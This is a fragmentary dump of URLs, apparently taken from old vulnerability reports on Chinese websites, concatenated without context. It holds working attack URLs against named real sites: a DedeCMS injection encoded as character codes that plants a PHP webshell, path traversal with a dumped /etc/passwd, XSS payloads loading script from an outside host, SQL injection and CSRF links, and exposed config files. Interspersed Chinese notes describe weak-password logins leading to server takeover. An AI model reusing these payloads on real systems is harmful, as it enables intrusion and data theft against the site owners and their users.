http://m.test.hupu.com/mobile_dev.php/bbs/1857971-42.html?_sf_ignore_cache=1 http://m.test.hupu.com/.svn/entries http://www.a8admin.com//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.a8admin.com//plus/mytag_js.php?aid=9013 http://www.a8admin.com//plus/90sec.php http://kaoshi.dianping.com/login.aspx http://tw.weibo.com/event/emergencyRoom/send http://tw.weibo.com/event/emergencyRoom/send/process?weibo=test http://www.haiertv.cn/appstoreView/newsInfo.xhtml?wmsShopAnnounce.announceId=25 http://i.youku.com/u/id_UMTcwMjk0NA== http://i.youku.com/user_pv/id_425736_md5_1e522f6831febf75e033cfe26fd0cec4_time_1372057646.html http://i.youku.com/u/get_status?__rt=1&__ro=&uid=425736&type=user_timeline&page=1&t=1372057786017&size=10 http://stat.hebnews.cn/mysql/count/abceffgh/abceffgh.js http://agent.xinnet.com/mailmanage.do?method=viewInfo&domainName=域名&serviceCode=服务编号 http://agent.xinnet.com/mailmanage.do?method=viewInfo&domainName=域名 qing.blog.sina.com.cn/tagtop/ ftp://113.200.69.186/ ftp://113.200.69.186/tools/ http://61.150.72.222:18080/ http://113.200.69.186:8080/ ftp://113.200.69.186/ufo/ https://emb-cda.mercedes-benz.com/content/china/mpc/mpc_china_website/zhng/home_mpc/passengercars/home/new_cars/models/cls-class/_c219/configurator/configurator_c218.https.html?tp_ccci=/dsc_cn/globalsessionid/DSC_cn602C353330676828FF3634370B550D00/dsc_locale/zs_CN/appId/DSC_cn/siteLocale/zs_CN/setInDLRQFlowOfCCiFlowrq.jam1%3bjsessionid=00007PbPyBR9STTCj1ESxqRv1F4:16p746flc http://www.lj-bank.com/www.rar http://nutrition.39.net/index.aspx?id=996 http://jc.cepp.sgcc.com.cn/ckfinder/ckfinder.html http://app.finance.ifeng.com/finance/fundhtml/.svn/entries http://app.finance.ifeng.com/finance/fundhtml/.svn/text-base/global.php.svn-base http://app.finance.ifeng.com/finance/fundhtml/.svn/text-base/common_inc.php.svn-base http://v.sn.vnet.cn/WEB-INF/web.xml http://v.sn.vnet.cn/WEB-INF/classes/com/thewebpagestudio/usersurvey/SurveyServlet.class http://v.sn.vnet.cn/WEB-INF/classes/com/thewebpagestudio/visit/CmsVisitServlet.class http://v.sn.vnet.cn//WEB-INF/config_path.xml https://excashier.alipay.com https://excashier.alipay.com/standard/trade20001/templateFlow.htm?orderId=3c1bb81c789148ceb67eba9515aad247&action=init http://admin:admin@192.168.1.1 http://192.168.1.1/userRpm/StatusRpm.htm?Disconnect=断 http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6 http://192.168.1.1/userRpm/FireWallRpm.htm?IpRule=0&MacRule=0&Save=%B1%A3+%B4%E http://192.168.1.1/userRpm/ManageControlRpm.htm?port=80&ip=255.255.255.255&Save=%C8%B7+%B6%A8 http://search.cs.wanmei.com/WEB-INF/web.xml http://search.cs.wanmei.com/WEB-INF/classes/config/spring/applicationContext-service.xml http://search.cs.wanmei.com/WEB-INF/classes/config/cfg/lore-hbm.xml http://search.cs.wanmei.com/WEB-INF/classes/resources/jdbc.properties http://jiading.tongji.edu.cn/GetFile.aspx?FileName=../Administration/admin.aspx http://jwc.tongji.edu.cn/down.jsp?tid=../liuyan/&file=index.jsp server:/usr/java/jdk1.6.0_25/jre/lib/i386:/usr/java/jdk1.6.0_25/jre/../lib/i386:/usr/java/packages/lib/i386:/lib:/usr/lib http://java.sun.com/ http://s.lakala.com/ http://s.lakala.com/rand.action?tempStr=0.7238308433443308 encap:Ethernet AC:16:2D:6F:FB:88 addr:10.1.21.67 Bcast:10.1.21.255 Mask:255.255.255.0 ae16:2dff:fe6f:fb88/64 Scope:Link MTU:1500 packets:46054995 packets:35720701 txqueuelen:1000 http://app.dns.com.cn http://wendang.dns.com.cn http://app.dns.com.cn/data/mysql_error_trace.inc http://app.dns.com.cn/admin8/login.php http://app.dns.com.cn/admin8/login.php http://wendang.dns.com.cn/admin8/login.php http://i.youku.com/u/UMTUxMDI3MDg=/feeds http://i.youku.com/u/get_status?__rt=1&__ro=&uid=3775677&type=user_timeline&page=1&t=1372078036571&size=30 http://sms.sd.vnet.cn/1.rar http://weiwen.weibo.com.zile.me http://user.huxiu.com/index.php?m=register&a=sendmail地址post四个参数,email为注册的邮箱地址,formhash是个随机数。 http://user.iiyi.com/center/notice/detail?uid1=4000754'&uid2=4000754 http://ext.iiyi.com/exam/my_show?rid=40132 http://ext.iiyi.com/exam/my_show?rid=40132 http://www.notc.gov.cn/cn/AboutUs.aspx?m=20121226155542340145 http://www.ycsbj.org/www.ycsbj.org.rar http://www.tsrsj.cn/web.rar http://go.sohu.com/2011/yidong121/ http://go.sohu.com/2011/yidong121/insert.php http://cs.csu.edu.cn/news_show!findById.action?id=59 http://www.balincan.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.balincan.com/plus/mytag_js.php?aid=9013 http://www.balincan.com/plus/90sec.php http://123.233.119.251:8083/sdgp/upload/ http://www.casarte.cn/ksd/list.php?city=%E5%8C%97%E4%BA%AC http://svn.go.sohu.com/scs/platform/ http://szvkh.vanke.com/bbs/ http://szvkh.vanke.com/bbs/login.asp的用户名里面依次输入下面内容提交 http://m.tineer.com/space_friend.php?uid=107 http://try.women.sohu.com/activity/info/201 http://comment4.news.sohu.com/dynamic/cmt_floor_all_2902000000.json?pageNo=2&pageSize=10 http://www.zjgl.gov.cn/zjgl.rar http://www.syjy.gov.cn/wwwroot.zip http://www.smartisanos.org/ http://www.dapianyun.com/ domain:shciq.gov.cn http://baoshuiqu.shciq.gov.cn/article.aspx?artid=401-1 http://fengxian.shciq.gov.cn/content.asp?myform=news&id=95-1 http://huagongqu.shciq.gov.cn/NewsInfo.aspx?id=294 http://songjiang.shciq.gov.cn/downnews.asp?id=54 http://huagongqu.shciq.gov.cn/admin/ http://songjiang.shciq.gov.cn/admin/Admin_Login.asp http://huagongqu.shciq.gov.cn/admin/ http://202.100.241.36:808/forui/policy/showpolicy.aspx http://127.0.0.1/shopadmin/index.php?ctl=passport&act=login http://119.60.11.43:8000/pagefolder/zcfgquery.aspx http://service.haier.net:8087/data/ http://jiu.sohu.com http://jiu.sohu.com/baijiu/product-Y3Rzb2h1LDIwMDg.html http://jiu.sohu.com/comment.php?action=list_comment&product_id=Y3Rzb2h1LDIwMDg&page=1&from=product&random=0.6170307428110391 http://jiu.sohu.com/user.php?uid=leixy147@sohu.com(为了方便测试不马赛克了) http://jiu.sohu.com/user.php?uid=leixy147@sohu.com&action=show&active=4 http://jiu.sohu.com/price_down.php?uid=leixy147@sohu.com http://jiu.sohu.com/mywin.php?uid=leixy147@sohu.com http://jiu.sohu.com/drinklog.php?uid=leixy147@sohu.com http://jiu.sohu.com/baseinfo.html http://jiu.sohu.com/drinklog.php.php?uid=攻击者邮箱@sohu.com http://stats.chinapost.gov.cn/user_login.action http://www.wczbtb.com/www.rar http://wczbtb.com/admin/ http://www.wczbtb.com/eWebEditor/admin_login.asp http://marketing.haieruhome.com http://123.234.41.27/chengguocontent.php?id=18&iid=366 http://123.234.41.27/www.rar http://123.234.41.27/FCKeditor/editor/filemanager/browser/default/connectors/test.html http://127.0.0.1/?u=f234 http://m.cheshi.com/web/click.php?type=click_pc&mid=85 http://epaper.crec4.com/ http://epaper.crec4.com/files/wjwb/456852.asp;page.jpg http://epaper.crec4.com/files/wjwb/pic_bulb.asp;.gif http://222.222.63.99:8213/gt/suginput.aspx?CorpCode=1902 http://183.60.177.83:9005/quhappyInter/loginAction.action http://www.sztaiji.com/sztaiji.rar http://www.zzmetro.com/adminindex.jsp jboss-4.2.2.GA/server/default/./deploy/jboss-web.deployer/ROOT.war/]$ http://koubei.jumei.com/review_U3eb202391155f8ec.html http://shop.tcl.com//Userprofile/doPass.html http://121.14.4.202:8008/log/ https://xianan.gov.cn/发现是天融信的产品,然后尝试弱口令扫描 http://vip.book.sohu.com http://vip.book.sohu.com/user/userhome.php http://vip.book.sohu.com/user/edit.php http://vip.book.sohu.com/account/index.php http://vip.book.sohu.com/user/trend.php http://vip.book.sohu.com/user/user_liketype.php?lovetype= http://61.156.3.105:8080/tydw/login/adminindex.jsf http://duomai.com/index.php?m=scoremall&a=detail&production_id=29 http://duomai.com/index.php?m=scoremall&a=slist&order=default&category_id=21 http://duomai.com/index.php?a=slist&category_id=26%20and%20sleep%282%29%20&m=scoremall http://duomai.com/index.php?a=forget_pwd&m=siter http://duomai.com/index.php?a=order&m=scoremall http://www.duomai.com/info.php http://www.hhht-ds-zy.gov.cn/news_x.aspx?id=XXX http://www.hhht-ds-zy.gov.cn/admin/login.htm http://whois.chinaz.com/smartisan.cn http://202.149.225.105/ http://wap.sz.gov.cn//admin/XWTP$content.action?docid= http://t.sohu.com/twAction/insertTwitter http://ebuy.skoda.com.cn/ http://fashion.jstv.com/phpmyadmin/index.php http://product.aili.com/caches/configs/.svn/text-base/database.php.svn-base http://show.aili.com/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=47 http://show.aili.com/index.php?50&attrpinyin=chuangshangyongpin http://wooyun.org/bugs/wooyun-2013-025740 http://www.gzgwbn.com.cn/ http://www.gzgwbn.com.cn/wwwroot.rar http://www.testin.cn/portal.action?op=Portal.index http://pilots.caac.gov.cn/examTH/namequery.asp http://www.pcpe.cn/zbbbs/jsp/news_editsave.jsp?fldm=101001 http://net.lakala.com/robots.txt/a.php http://net.lakala.com/View/1%3Cimg%20src=logo.gif%20onerror=alert%28document.domain%29%3E/ac/RA000851/cc/RC0002700 http://www.yxhouse.net/ http://www.yxhouse.net/tbs/shownewstext.action http://ns.huangshi.gov.cn/,探测出3389和21端口开放,并提供了http://ns.huangshi.gov.cn/phpMyAdmin入口,然后尝试弱口令登录,用户名root,密码root登录成功 http://60.208.75.174:8080/ http://uec.mail.10086.cn/admin/login.jsp www.xinnet.com/xinnetol.war http://www.xinnet.com/xinnetol.war http://web.youxipai.com/games/dhhz/detail.php?colName=pic&id=27 http://web.youxipai.com/kefu/helplist?catid=8 http://my.feixin.10086.cn/user/modify/ http://www.scit.gov.cn/login!login www.fingerage.com http://www.fingerage.com/article.html?id=18 xlink:href= http://www.w3.org/2000/svg http://t.sohu.com/event/insertTw?msg=testtest http://t.sohu.com/debate/sendMsg?did=6804&msg=tecsrfst http://www.swiet.com.cn:8188/index.action http://www.oir.pku.edu.cn:8081/bd@manager/login.php?gotopage=%2Fbd%40manager%2Findex.php site:eat.gd.sina.com.cn http://eat.gd.sina.com.cn/admin/pic.php http://eat.gd.sina.com.cn/admin/manager_checked.php http://eat.gd.sina.com.cn/admin/manage_rstrt.php http://eat.gd.sina.com.cn/admin/manage_rstrt_union.php http://eat.gd.sina.com.cn/admin/passages_post.php www.xywz120.com http://www.baidu.com.whmsyy.net/ http://vender.railstone.com.cn/registAction.action www.hevttc.edu.cn http://www.chekucafe.com/content_mtbd2.php?NID=191 http://www.chekucafe.com/content_cygs.php?NID=41 http://u.youxipai.com/support/submit?id=23796 http://iss.ruc.edu.cn/article.php?aid=52 http://222.66.109.136:8088/hr/zzbyuangong_all.action http://www.dns.com.cn/newmember/binding/mobile_binding.php http://www.ksf-csxy.com/#/home/,可以直接通过请求一个文件,直接快速地获得大量积分及抽奖资格(原本需要几十分钟才能完成的)。另外通过输入某个网址,可以直接查看到详细的中奖者信息,中奖者真实姓名、手机、联系地址、电子邮箱等一览无余。 http://125.76.237.175/index.aspx即可 site:bai.sohu.com inurl:action http://democn.b2b-builder.com/?m=offer&s=offer_list&id=1004 http://www.sdxtgh.gov.cn/sys_login.asp http://gg.pp.cc/waibao/hl/active.php?year=2013&month=6&date=6 http://bb.zjj.gov.cn/news/sys1/wz/wz_add.asp?id=2013 http://jxpg.zjj.gov.cn/news/sys/wz/wz_add.asp?id=3291 http://map.srcb.com:8055/srcbGIS/searchCompany.do?disUID=-1&companyTypeID=1&pageNO=1&pageSize=10&companyName=%E5%8D%97%E6%B1%87%E6%94%AF%E8%A1%8C%E8%90%A5%E4%B8%9A%E9%83%A8 http://www.inmyshow.com/home/read.php?id=58 http://minisite.youku.com/pub2/paike/form2.php http://minisite.youku.com/pub2/paike/form.php http://minisite.youku.com/pub2/paike/admin.php http://wifi.189.cn/ http://61.144.36.122/aisino/aisino/portal/newcenterdetail.do?code=00000101&index=84017 http://61.144.36.122/jmx-console/ url:http://f-roadpay.com.cn/froadpay/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector http://www.hbjs.gov.cn/jcms/m_5_e/init/messagebook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd http://www.lzcgq.gov.cn/jcms/m_5_e/init/messagebook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd http://home.ithaier.com//UserFiles/Flash/3.asa;.jpg www.52pk.com http://flash.52pk.com/list/search2.php?keyword=%C4%D0%C9%FA http://web.youxipai.com/kefu/helplist?catid=8 http://vip.book.sohu.com/ http://vip.book.sohu.com/m http://jyz.sdxm.gov.cn/#/Default.xaml http://tuchong.com/account/reset/?code=1372415571&sign=9c4a3cab666fcddfdcec52a0d87ff73f&email=smtp_admin%40yeah.net http://weibo.pp.cc/member.php?mod=login&type=sina www.pp.cc http://plus.youxipai.com/search.php?typeid=3&filesize=1t1 http://bbs.dedecms.com http://t.pp.cc/time/index.php?mod=send&action=save&account=&inajax=1&random=983&id=0&isSync=1&content=test2323&uploadpic=&contentpic=&power=0&contentid=0&pid=0&mypid=0&date=2013-06-29&hour=00&minute=21&diff=10&istimer=0&referer=&musicurl=&musictitle=&musicauthor=&videourl=&videopic=&videotitle=&videoshort=&playerurl=©_one=0©_two=0©_three=0©_four=0&submit=yes&rswitch=1&myfrom=pp http://159.226.76.101/jsp-examples/jsp2/jspx/textRotate.jsp?o=index http://159.226.76.101/jsp-examples/jsp2/jspx/update.jsp http://renmai.weibo.com/0/resume/download http://www.csndmc.ac.cn/newweb/secondpage.jsp?id=1120 http://wx.pp.cc http://wx.pp.cc/wb_ajax/update_action?act=del&id_str=任意ID http://wx.pp.cc/wb_ajax/preview/任意文章ID/1372420599?t=1372403376&preview=1 http://survey.game.renren.com/index.php?sid=71521 http://survey.game.renren.com/admin/admin.php http://58.252.101.42:9083/rtssh/LoginAction.action http://i.sohu.com也有发微博功能,和http://t.sohu.com是同步的,那么,就来抓抓包看看吧。 http://i.sohu.com/a/app/mblog/save.htm?_input_encode=UTF-8 http://t.sohu.com/gy/twitter/support?msg=csrf%20by%20vip&wgyId=5313 http://fx.qfpay.com/admin/login http://www.vrking.net网站后台存在弱口令。后台上传获得webshell权限 http://www.vrking.cn/admin http://www.enet.com.cn/edigi/inforcenter/index.jsp http://pay.qq.com/ http://www.jdjob88.com/myNew/down.php?filename=../index.php http://oa.18yl.com/default.aspx IP:http://125.39.72.67:8080/ IP:http://125.39.72.58:8080/ http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=aaa http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=aaa%bf http://job.lzu.edu.cn/search!getInfoSearch.action http://pet.pp.cc/index.php?m=userset&action=savePersonalBasic http://wx.pp.cc/index.php/wb_u/my_editwxuser/33789 http://wx.pp.cc/index.php/wb_u/my_editwxuser/33790 http://lelink.ecare365.com/admin/index.php http://lno.pw/exp1.htm处 http://www.quamnet.com/newscontent.action?listSectionCode=NEW_REST&articleId=2930903 http://test.baidu.com/crowdtest/default/index http://developer.baidu.com/dev#/account/new http://yun.baidu.com/cloud/home http://tuan.baidu.com/ http://lvyou.baidu.com/user/edit/info/ http://campus.baidu.com/ http://app.baidu.com/app/enter?appid=104206 http://developer.baidu.com/dev#/account/new http://www.surfingjs.com/开始渗透,齐博cms,管理员弱口令不用我说了吧,后台地址也不知道改一下,本来后台拿shell还是比较麻烦的,不过还是有办法,请百度,讲解很详细,服务器配置不当,权限大得一塌糊涂,直接执行命令,添加用户,登录服务器,得到管理员帐号密码,用相同密码登录内网服务器。至此渗透完成 http://pplms.cn/x/admin/IndexManage.asp http://m.the9.com/developer/cn/ http://m.the9.com/developer/cn/newsshow.php?id=507 http://m.the9.com/developer/cn/newsshow.php?id=507 http://bbs.dedecms.com http://10010app.cn/iweb/ http://www.hzsany.com http://www.hzsany.com/load.do?oper=goToZwsq&menuId=5&code=zwsq http://www.sanyedu.com/ http://www.sanyedu.com/FCKeditor/editor/filemanager/upload/test.html http://parts.sanygroup.com/ http://sanyphoto.sanyhe.com/入侵 http://t.sohu.com/live/insertw?lid=3670&msg=csrftest http://www.hdgl.gov.cn/read_news.php?id=179 http://www.hdgl.gov.cn/read_news.php?id=162 http://www.kugou.com/newuc/user/resetpwd/code=EE0544XXXXX4CEBB2E41E56C8E0A6413E43FA3FC19B9E0109DC39CD44C7690639226405CB880FC5C514494DB1424138BBEE12128F8DFFA51BE00B1B03EDFAF2CF5939DF58D006AD7B87D360C02F506673E30A239B3E70E7D4D1C7A3221E867004F138738844FED20CB18DCB38C9394AAXXXXXXX3909CAE http://www.kugou.com/newuc/user/resetpwd/code=EE0544E28Bxxxxxxxxx6A370EBF23FC56592BFEC3962E8156A71054BE3594F143AEF142A1425AE5F09E961A040DE6F90F8F305C5E866A8A4EF00DB71289745F6F08CAA790F5AA67060541354E57E71BE58CE00B80930 http://cu.17k.com/cuser/updateCuserInfo.action?cuser.id=1 http://sxpp.sina.com.cn/doc/1.php http://minisite.163.com/2006/0615/abbott/page09.php?userID=209 http://cms.netease.com:9039/ http://www.hbrf.gov.cn/www.rar http://www.hbrf.gov.cn/upload/ http://www.hbpop.gov.cn/tongji/ http://www.hbpop.gov.cn/tongji/Default.aspx http://www.evergrandefs.com/DetailPage!lookTeachContent.htm?pageConId=100767%27&menuCode=127&menuLevel=3&url=DetailPage!lookTeachContent.htm http://xjd.tcl.com/jxscx.asp http://www.dgdianxin.com/ http://sd.189.cn/WEB-INF/classes/jdbc.properties http://sd.189.cn/WEB-INF/web.xml http://www.jmxinghua.com/news/index.asp http://api.t.sina.com.cn/oauth/authorize?oauth_token=94246086381d229991d4960d4f602ad1&oauth_callback=http%3A%2F%2Ftuchong.com%2Fbind%2F http://tuchong.com/bind/ http://api.t.sina.com.cn/oauth/authorize?oauth_token=d2437d0957de924e04cfa7f002665055&oauth_callback=http://wooyun.org http://wooyun.org,攻击者获取了用户的oauth_token和oauth_verifier后,就可通过http://tuchong.com/bind/?oauth_token=xx&oauth_verifier=xxx的形式登录用户帐号了。 https://221.202.118.50/admin/ids/waf_update.php http://mice.pudong.gov.cn/page/index.action http://www.imaidan.com/user-modify_password/code-6位数字验证码-id-用户id http://hdmv.app.56.com/web/getuserdata_56.asp?mvid=MTQ3NzE0IGhhdmluZyAxPTEtLQ== http://www.calis.edu.cn/educhina/viewnews.do?newsid=69 http://bbs.7k7k.com/images/default/logo.gif/a.php http://bbs.7k7k.com/memcp.php?action=profile&typeid=3 http://bbs.7k7k.com/uc_server_7k7k/admin.php?m=user&a=login&iframe=&sid= http://qingdao.imaidan.com/uc_account-save http://home.meishichina.com/event.php?classid=6 http://summit.ufida.com/ http://bbs.games.sina.com.cn/dingzhi/digest.php?bid=556&list=0,1,0,0,1&trnum=11&tdnum=1&hit=0&intime=1&strnum=24&namenum=5&datetype=2&dian=0&zidian=0&tp=0&reply=0&leixing=1&shijian=0 http://123.126.55.209:8000/ http://pinche.club.sohu.com/.svn/entries http://www.gzgwbn.com.cn/wwwroot.rar http://ask.imaidan.com/?/account/ajax/save_draft/item_id-653__type-answer http://xss.tw/989 http://author.17k.com/author/addContractApply.action?contractApply.bookId=177707&contractApply.introduction=test%22%3E%3C%2Ftextarea%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxss.sckxz.org%2Findex.php%2F211%3E%3C%2Fscript%3E&contractApply.relation=test%22%3E%3C%2Ftextarea%3E%3Cscript%20src%3Dhttp%3A%2F%2Fxss.sckxz.org%2Findex.php%2F211%3E%3C%2Fscript%3E&input01=0&struts.token=NYCOQB87ES822L9AEOMMPCQ0602SQNSG&struts.token.name=struts.token http://58.56.128.29/site2/ http://58.56.128.29/cms/ https://111.12.44.24/web/index.php https://111.1.1.119/web/index.php http://my.hupu.com/tools/bookmarklet.php http://www.scfs.gov.cn/webfront/html/article/201302281700010001.html http://www.scfs.gov.cn/article/loadArticleHtml.action?articleId=201302281700010001 http://202.102.108.47:8081/dxpt/ http://202.102.108.47:8081/dxpt/mainIndex.action http://www.imaidan.com/uc_topic-add?content=testcsrf http://cdyj.haier.com/Company/admin/ http://cdyj.haier.com/Company/admin/admin_template.asp?path=../template/../ URL:http://api.xinnet.com/domain/api.gb URL:http://api.xinnet.com/domain/api.gb?method=getTransoutPassword lexue.lenovo.com.cn/lms,登录后,个人信息处,照片上传。burp抓包,选择jsp文件,点击保存,burp未提示,网页弹出"照片格式错误",初步确定为本地js验证上传文件格式。 http://61.156.3.86 http://pay.duowan.com/showTempOrderDetail.action?depositOrderId=20130627215452T5K3U1IVTS http://www.mmclick.com/info/col.jsp?cid=7&row=1&page=1 http://ensupport.zte.com.cn/CSC/UILoader/Login.aspx http://survey.news.sina.com.cn/test.php http://roll.2008.sina.com.cn/test.php https://netlogin.sina.com.cn/ http://202.106.182.172/admin/blog/login.php http://www.yto.com.hk/ http://b131.demo.www.net.cn/admin/login.aspx http://freepp.10102020.net/wpb/ http://freepp.10102020.net/wpb/config.ini https://ecc.zte.com.cn/epm/uiloader/login.html http://online.suning.com/webchat/down.jsp?file=../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin snadmin:x:500:500::/home/snadmin:/bin/bash wcsuser:x:800:800::/home/wcsuser:/bin/bash http://wap.cmread.com/ http://wap.cmread.com/sso/oauth2/login?e_l=2&f=1767&pg= http://wap.cmread.com/sso/oauth2/smsResetPwd?txId=bdXXXXXXXXXXXXXXXXXXXXXXXXXXXX5d&msisdn=158XXXXXXXX 